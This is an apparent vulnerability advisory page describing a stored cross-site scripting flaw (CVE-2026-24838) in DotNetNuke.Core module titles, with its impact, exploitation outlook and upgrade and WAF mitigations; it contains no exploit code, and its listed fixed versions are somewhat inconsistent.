Platform
dotnet
Component
dotnetnuke.core
Fixed in
9.13.11
10.0.1
9.13.10
CVE-2026-24838 is a critical Cross-Site Scripting (XSS) vulnerability affecting DotNetNuke.Core versions up to 9.9.1. This flaw arises from the module title field allowing rich text content, which can be exploited to inject and execute malicious scripts. Successful exploitation could lead to account takeover or defacement. The vulnerability was published on January 28, 2026, and a fix is available in version 9.13.10.
An attacker can leverage this XSS vulnerability to inject arbitrary JavaScript code into the module title field. When a user views the affected module, the injected script will execute within their browser context. This can lead to a variety of malicious outcomes, including session hijacking, redirection to phishing sites, and the theft of sensitive information like cookies and authentication tokens. The impact is particularly severe because module titles are often displayed prominently on websites, increasing the likelihood of user exposure. A successful attack could also allow an attacker to modify website content, leading to defacement or the dissemination of malware.
CVE-2026-24838 is currently not listed on the CISA KEV catalog. Public proof-of-concept exploits are not yet widely available, but the vulnerability's severity and ease of exploitation suggest a potential for rapid exploitation. Given the XSS nature of the vulnerability, it is likely to be targeted by automated scanners and malicious actors. The NVD was published on January 28, 2026.
Exploit Status
EPSS
0.03% (10% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-24838 is to upgrade DotNetNuke.Core to version 9.13.10 or later. If immediate upgrading is not possible, consider implementing a Web Application Firewall (WAF) rule to filter out potentially malicious rich text content in module titles. Specifically, look for patterns indicative of JavaScript injection attempts. Additionally, carefully review and sanitize any user-supplied input used in module titles before rendering them on the website. After upgrading, confirm the fix by attempting to inject a simple JavaScript payload into a module title and verifying that it does not execute.
Update DotNetNuke to version 9.13.10 or later, or to version 10.2.0 or later. This will resolve the stored XSS vulnerability in the module title. The update can be performed through the DotNetNuke administration panel.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-24838 is a critical Cross-Site Scripting (XSS) vulnerability in DotNetNuke.Core versions up to 9.9.1, allowing script execution via the module title's richtext functionality.
If you are using DotNetNuke.Core versions 9.9.1 or earlier, you are potentially affected by this vulnerability. Check your version and upgrade accordingly.
Upgrade DotNetNuke.Core to version 9.13.10 or later. As a temporary workaround, implement a WAF rule to filter malicious rich text content.
While no active exploitation has been confirmed, the vulnerability's severity and ease of exploitation suggest a potential for rapid exploitation.
Refer to the official DotNetNuke security advisory for detailed information and updates regarding CVE-2026-24838.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.
Upload your packages.lock.json file and we'll tell you instantly if you're affected.